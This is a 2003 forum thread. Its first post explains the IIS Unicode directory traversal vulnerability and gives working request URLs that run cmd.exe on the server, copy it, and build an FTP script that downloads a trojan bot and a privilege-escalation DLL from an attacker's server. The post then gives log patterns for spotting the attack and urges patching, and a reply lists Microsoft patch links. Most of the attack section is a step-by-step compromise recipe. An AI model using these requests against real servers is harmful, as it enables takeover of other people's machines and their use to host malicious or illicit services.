|
-
May 25th, 2003, 03:47 AM
#1
Member
Unicode Vuln, How Its Hacked, How Its Used, How To See and FIX
I had to add quotes and such because this BBS is messing with some stuff......
i will try my best to use complete sentences like i learned in 3rd grade.
I KNOW THIS IS AN OLD VULN, BUT MANY MANY MACHINES ARE STILL HACKED THIS WAY, SO IM POSTING IT. please patch yourselfs....
disclamer : none of this information is to be used out of context, i am not responsible for how you use it, or what your mind choices to do with it. futhermore, its educational, and for that purpose only.
First i will start with how it is done, then how it is used, then how to defend, and lastly, how to fix.
The first step in hacking of iis unicode vuln machines, those vulnerable to the ../../..%255c../winnt/system32/cmd.exe type vulns, is finding them. Usually this is done by a custom scanner, or someone using other systems. The scanner starts by identifying the host computer, which usually uses random hosts and marks which ones return IIS 4.0 and IIS 5.0. After this part of the scan is complete, each host is scanned for some 200 unicode vuln's. Depending on which one's they find, will depend on how they are exploited. So, lets get into it.
Lets say your doing this on yourself...(your the attacker)
http://127.0.0.1/
after you scan for vuln unicode strands, you see yourself as being vuln to
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe
which means your system is not secure against the unicode directory transversal and thus you can access a cmd prompt through it. At this point, the attacker, (i will refrain from using hacker, because it is hardly), will do a basic call of cmd.exe, something like
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe?/c+dir+c:\
which would display the contents of your C:\ drive.
next, the attacker(you) would create your own copy of cmd.exe, so you dont have to deal with copy attribute problems.
something like...
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+C:\inetpub\scripts\temp.exe
Next, there are two different ways to get the files they want onto your computer, one is too simple to explain, which is by using the tftp.exe service and remotly downloading off an tftp server. But it is not the most popular, for the simple reason it is harder to setup.
Instead the next thing the attacker will do is create an ftp script to download files for you. usinng the echo commands, we create an ftp script.
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+open+tempftp+21+>+C:\inetpub\scripts\temp.txt
temp ftp being the ftp on which the files lay, 21 being the port
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+login+>>+C:\inetpub\scripts\temp.txt
login=ftp login info
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+password>>+C:\inetpub\scripts\temp.txt
password=ftp pass info
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+get+temp.zip+>>+C:\inetpub\scripts\temp.zip
downloading the trojan bot file.
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+get+httpodbc.dll+>>+C:\inetpub\scripts\temp.txt
httpodbc.dll is a common priv escalation priv exploit
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+exit+>>+C:\inetpub\scripts\temp.txt
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+quit+>>+C:\inetpub\scripts\temp.txt
must quit and exit, or else proc hangs
then, to send the command to download, simple use...
http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+ftp.exe+-s:C:\inetpub\scripts\temp.txt
and ftp.exe will use your script and download all your files.
Next, the attacker will logon to wherever they have placed their files, in our case, C:\inetpub\scripts\temp.txt, the file must be accessable by the web..., but most are...
http://127.0.0.1/scripts/httpodbc.dll
they enter in their command to run,, in our case
C:\inetpub\scripts\temp.zip (can be an exe if self extracting)
httpodbc.dll returns with a positive and reporting that privs were escalated for the execution.
This computer can now be completly controled and used however the attacker wants, some iis servers run connected to t3 as well, so lots of bw wasting.
i wont go into anymore about how they are hacked for fear of being banned...
i will answer more indepth questions in priv messages...
Catching The attack:
Easyest way to prevent this attack, is simple updates, which some dont use. There are many fixes for this problem, but still thousands of machines are attacked. If you notice your computer moving very slow, or using unusual ammounts of bandwidth. Another way, if you want to backtrack and see when you were attacked, look into the iis logs for anything resembling
Get /.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe 200
if it is a 404 instead of a 200, then you are fine, a 200 simply means it returned positive.
What the hell are these used for?:
The most common thing these machines are used for is serving warez/porn. I have seen other, more sophisitcated things, such as bnc's, tunnels, irc servers, FXP servers, e-mail hosts, and just about as much as you can imagine.
The most secure way to fix this problem, if you arnt infected, update, if you are, you most likly need to clean your whole system. Treat it as any other compromise.
BOTTOM LINE:
Please upgrade this stuff, its been out for almost 2 years, and im getting tired of seeing them online,, just because your behind a firewall, doesnt mean your safe from lame old attacks either....
sectac
The Hack Back Revolution
irc.dal.net:#guesswhatyourhacked
-
May 25th, 2003, 02:13 PM
#2
Good post, perhaps usefull to include the links to the patches or sources?
Folder traversal patch
http://www.microsoft.com/technet/sec...n/MS00-078.asp
IIS 5.0 patch
http://www.microsoft.com/windows2000...62/default.asp
IIS 4.0 patch
http://www.microsoft.com/ntserver/nt...62/default.asp
MS extended unicode bug, vulnerable systems list
http://www.securityfocus.com/bid/1806
thecorpz.org had a good tutorial with many links about these unicode risks but that site has no contents anymore, howvere google cache can be helpfull 
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote